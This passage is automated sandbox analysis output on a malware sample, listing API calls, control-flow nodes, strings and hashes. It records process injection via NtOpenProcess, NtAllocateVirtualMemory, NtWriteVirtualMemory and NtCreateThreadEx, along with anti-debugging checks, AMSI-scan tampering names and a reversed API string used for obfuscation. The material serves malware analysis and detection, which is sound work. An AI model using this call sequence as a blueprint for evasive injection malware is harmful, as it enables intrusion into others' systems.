6361 2ecb9d8-2ecbb51 call 2ec7c20 call 2ec7a3c call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6359->6361 6361->6248 6428 2ecbb57-2ecbccd call 2ec7a3c call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6361->6428 6428->6248 6473 2ecbcd3-2ecbf43 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecafd8 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6428->6473 6546 2ecbf49-2ecbf4a 6473->6546 6547 2ecc0e1-2ecc23f call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6473->6547 6549 2ecbf4e-2ecc0db call 2ecafd8 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 6546->6549 6632 2ecc26b-2ecca36 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ecafe4 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec7d88 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 GetModuleHandleW call 2ec8284 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 NtCreateThreadEx call 2eb4860 6547->6632 6633 2ecc241-2ecc266 call 2ecaf28 6547->6633 6549->6547 6869 2ecca3b-2eccd28 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2eb4860 call 2eb49a0 call 2eb46d4 call 2eb47ec call 2eb49a0 call 2eb46d4 call 2ec89e0 call 2ec895c * 5 call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2eb4860 call 2eb49a0 call 2eb47ec call 2eb49a0 call 2ec895c call 2ec8090 call 2ec895c * 2 6632->6869 6633->6632 6869->6248
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02F37380,02ECCFC4,ScanString,02F37380,02ECCFC4,ScanBuffer,02F37380,02ECCFC4,ScanString,02F37380,02ECCFC4,UacScan,02F37380), ref: 02ECB3EE
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • NtOpenProcess.NTDLL(02F37584,001F0FFF,02F37318,02F37330), ref: 02ECB4EC
                                                                    • Part of subcall function 02EB2EE0: QueryPerformanceCounter.KERNEL32 ref: 02EB2EE4
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000078,00000000,00000000), ref: 02ECB7CA
                                                                    • Part of subcall function 02EC7A3C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF
                                                                  • IsBadReadPtr.KERNEL32(16260000,00000040), ref: 02ECB963
                                                                  • IsBadReadPtr.KERNEL32(?,000000F8), ref: 02ECB990
                                                                    • Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC
                                                                  • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02F37380,02ECCFC4,ScanString,02F37380,02ECCFC4,048E0000,048E0000,16580000,1FD45251,02F37588,OpenSession,02F37380,02ECCFC4), ref: 02ECC80C
                                                                  • NtCreateThreadEx.NTDLL(02F37560,02000000,02F37318,048E15CE,048E15CE,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02F37380,02ECCFC4,UacInitialize,02F37380), ref: 02ECCA1D
                                                                    • Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
                                                                    • Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
                                                                    • Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc$LibraryMemoryProcessReadVirtual$AllocateCounterCreateCurrentFreeLoadOpenPerformanceQueryThreadWrite
                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                  • API String ID: 321279507-1870492900
                                                                  • Opcode ID: 0f95d3231df0e8a99e264d5cec9542f057e4387ad8de14ee59d9162104bcf211
                                                                  • Instruction ID: 6598ad9ba21e926d78bc80db57bcfb8c5f4cbd1aee04a7db094b481b53d761e3
                                                                  • Opcode Fuzzy Hash: 0f95d3231df0e8a99e264d5cec9542f057e4387ad8de14ee59d9162104bcf211
                                                                  • Instruction Fuzzy Hash: BBF2F535B801599BDB12FBA4DD91BDFB3F6AF45300F20E1A6B048AB655DA309E42CF41

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10170 2eb5acc-2eb5b0d GetModuleFileNameA RegOpenKeyExA 10171 2eb5b4f-2eb5b92 call 2eb5908 RegQueryValueExA 10170->10171 10172 2eb5b0f-2eb5b2b RegOpenKeyExA 10170->10172 10177 2eb5bb6-2eb5bd0 RegCloseKey 10171->10177 10178 2eb5b94-2eb5bb0 RegQueryValueExA 10171->10178 10172->10171 10173 2eb5b2d-2eb5b49 RegOpenKeyExA 10172->10173 10173->10171 10175 2eb5bd8-2eb5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10173->10175 10179 2eb5c0f-2eb5c13 10175->10179 10180 2eb5cf2-2eb5cf9 10175->10180 10178->10177 10181 2eb5bb2 10178->10181 10183 2eb5c1f-2eb5c35 lstrlenA 10179->10183 10184 2eb5c15-2eb5c19 10179->10184 10181->10177 10185 2eb5c38-2eb5c3b 10183->10185 10184->10180 10184->10183 10186 2eb5c3d-2eb5c45 10185->10186 10187 2eb5c47-2eb5c4f 10185->10187 10186->10187 10188 2eb5c37 10186->10188 10187->10180 10189 2eb5c55-2eb5c5a 10187->10189 10188->10185 10190 2eb5c5c-2eb5c82 lstrcpynA LoadLibraryExA 10189->10190 10191 2eb5c84-2eb5c86 10189->10191 10190->10191 10191->10180 10192 2eb5c88-2eb5c8c 10191->10192 10192->10180 10193 2eb5c8e-2eb5cbe lstrcpynA LoadLibraryExA 10192->10193 10193->10180 10194 2eb5cc0-2eb5cf0 lstrcpynA LoadLibraryExA 10193->10194 10194->10180
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5AE8
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B06
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B24
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EB5B42
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EB5B8B
                                                                  • RegQueryValueExA.ADVAPI32(?,02EB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001), ref: 02EB5BA9
                                                                  • RegCloseKey.ADVAPI32(?,02EB5BD8,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EB5BCB
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02EB5BE8
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02EB5BF5
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02EB5BFB
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02EB5C26
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5C6D
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5C7D
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02EB5CA5
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02EB5CB5
                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02EB5CDB
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02EB5CEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: b309eb5f4fdbb8956266ff5bcfbfaa2c35321493f6c4efcfcd0d4d774be191fc
                                                                  • Instruction ID: 9843e7f3d82e51b48dfb62cb70791746bd5f5591b56257b7ace44a7e820c0ddd
                                                                  • Opcode Fuzzy Hash: b309eb5f4fdbb8956266ff5bcfbfaa2c35321493f6c4efcfcd0d4d774be191fc
                                                                  • Instruction Fuzzy Hash: FE51D871E8025C7EFB26D6A4CC56FEF77AD9F04344F8091A1BA08E6181EB749A448F60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 12430 2ec895c-2ec8981 LoadLibraryW 12431 2ec89cb-2ec89d1 12430->12431 12432 2ec8983-2ec899b GetProcAddress 12430->12432 12433 2ec899d-2ec89bc call 2ec7d88 12432->12433 12434 2ec89c0-2ec89c6 FreeLibrary 12432->12434 12433->12434 12437 2ec89be 12433->12437 12434->12431 12437->12434
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6
                                                                    • Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                  • API String ID: 1002360270-4067648912
                                                                  • Opcode ID: 1c13862597e16948c3a4aae1812f8250af36ccd1b46b9f9a5c9385a0ec05922c
                                                                  • Instruction ID: 9f3243277d32d670d9df9fe512e3dff7b2b1ae18da53c48af54601560e0c9b84
                                                                  • Opcode Fuzzy Hash: 1c13862597e16948c3a4aae1812f8250af36ccd1b46b9f9a5c9385a0ec05922c
                                                                  • Instruction Fuzzy Hash: 1CF0A9F1AC0308EEE311BBB9AE49B97F79EDB87798F00586AF90887140C2715850CB60

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 12447 2ecf748-2ecf762 GetModuleHandleW 12448 2ecf78e-2ecf796 12447->12448 12449 2ecf764-2ecf776 GetProcAddress 12447->12449 12449->12448 12450 2ecf778-2ecf788 CheckRemoteDebuggerPresent 12449->12450 12450->12448 12451 2ecf78a 12450->12451 12451->12448
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KernelBase), ref: 02ECF758
                                                                  • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02ECF76A
                                                                  • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02ECF781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                  • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                  • API String ID: 35162468-539270669
                                                                  • Opcode ID: 998e83af3abce510b6378e7e50cfbba24b9b0566e8d1ad1a6a37d38ac458f324
                                                                  • Instruction ID: 9c190732545ce1c889dc58a61f1444da7b32f57ebe0ecc3eb3178797ec5a4bd8
                                                                  • Opcode Fuzzy Hash: 998e83af3abce510b6378e7e50cfbba24b9b0566e8d1ad1a6a37d38ac458f324
                                                                  • Instruction Fuzzy Hash: 26F0273094034CAADB10A7F889887DCFBAA4B0932CF3493A9A430710C0E7711240C655

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02EB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4F2E
                                                                  • RtlD.N(00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDAF
                                                                  • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02ECDE44), ref: 02ECDDDF
                                                                  • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02ECDDF4
                                                                  • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02ECDE20
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02ECDE29
                                                                    • Part of subcall function 02EB4C60: SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                                  • String ID:
                                                                  • API String ID: 2659941336-0
                                                                  • Opcode ID: 791e271a119b8057a7b2d152bd98ff873f959bf64df79dec9e88822130ab9a97
                                                                  • Instruction ID: c18b50ffda6f62d05ec6f6756a6a851b587b3a013cbfb09e4ccc9bfe0fa49d64
                                                                  • Opcode Fuzzy Hash: 791e271a119b8057a7b2d152bd98ff873f959bf64df79dec9e88822130ab9a97
                                                                  • Instruction Fuzzy Hash: 86210375A802187EEB12EAD4CD52FDFB7BDEF48B00F505465B600F71C1DAB4AA058B54

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02ECE5FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CheckConnectionInternet
                                                                  • String ID: Initialize$OpenSession$ScanBuffer
                                                                  • API String ID: 3847983778-3852638603
                                                                  • Opcode ID: 4576b56af97537aca88b959e2da76ccecdd23b1fff1334428db2ad06523e0390
                                                                  • Instruction ID: 9bd99a2da2b6aa356bc8808dafd7634f667e04f7fa71b7f63c4be30d0621b936
                                                                  • Opcode Fuzzy Hash: 4576b56af97537aca88b959e2da76ccecdd23b1fff1334428db2ad06523e0390
                                                                  • Instruction Fuzzy Hash: E3411275B901499BEB02FBE4D951ADF73FAEF88700F60E425F041A7286DA74AD028F51

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 02EB4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4F2E
                                                                  • RtlD.N(00000000,?,00000000,00000000,00000000,02ECDD62), ref: 02ECDCCF
                                                                  • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02ECDD09
                                                                  • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02ECDD36
                                                                  • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02ECDD3F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: File$AllocCloseCreateStringWrite
                                                                  • String ID:
                                                                  • API String ID: 3308905243-0
                                                                  • Opcode ID: 289a63fbbbac0fc68b0806475ad0e51ebc15d3602f5c17539d95ac5a01a38f3b
                                                                  • Instruction ID: 9ad1d0c5fab2c81a49bd96e3fe2de6f2aa512da70d9fb31ce04abe97805522f5
                                                                  • Opcode Fuzzy Hash: 289a63fbbbac0fc68b0806475ad0e51ebc15d3602f5c17539d95ac5a01a38f3b
                                                                  • Instruction Fuzzy Hash: 6821E071A80208BAEB11EAD0CD52FDEB7BDDF05B00F609465B600F71C0D7B4BE058A64
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02EC7AAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                  • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                  • API String ID: 4072585319-445027087
                                                                  • Opcode ID: d0f02b2f9be4ac149336f09287d59d2b659a37e3ade0f9a40431d5afbb8f5c5e
                                                                  • Instruction ID: 0ab5f25292b77a57759a5c602a2f8f031e3c1594d1bc75c6d85eb316898c6c6b
                                                                  • Opcode Fuzzy Hash: d0f02b2f9be4ac149336f09287d59d2b659a37e3ade0f9a40431d5afbb8f5c5e
                                                                  • Instruction Fuzzy Hash: AD115B75680208AFEB06EFA4DD51EEFF7EEEB48700F619464B904D7640D630AA11CF60
                                                                  APIs
